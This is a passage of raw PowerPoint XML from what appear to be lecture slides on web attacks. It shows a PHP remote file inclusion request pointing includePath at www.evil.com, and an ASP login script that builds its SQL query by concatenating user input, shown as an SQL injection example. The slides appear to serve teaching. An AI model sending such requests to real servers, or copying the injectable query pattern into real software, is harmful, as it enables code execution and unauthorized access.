              <a:t>library.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>math.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET /includes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>library.php?includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229007650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0034" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="940035" name="Picture 3" descr="login_asp"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282575" y="1595182"/>
            <a:ext cx="8578850" cy="4181475"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253146238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400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82" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>login.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;td&gt;Username:&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>td&gt;&lt;input type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="text" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="username"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;td&gt;Password:&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>td&gt;&lt;input type=password name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="password"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="submit" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="reset" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="Reset"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84089842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4208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42083">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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42083">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4208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42083">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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42083">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942083">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942083">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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942083">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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942083">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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94208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4130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Login Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;% function Login( connection ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("username");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("password");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Server.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ADODB.Recordset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pubs.guest.sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>             where username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>+ username + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and \ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>             password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>+ password + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"'";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, connection); //perform query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.EOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) //if record set empty, deny access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %&gt;  &lt;center&gt;ACCESS DENIED&lt;/center&gt; &lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
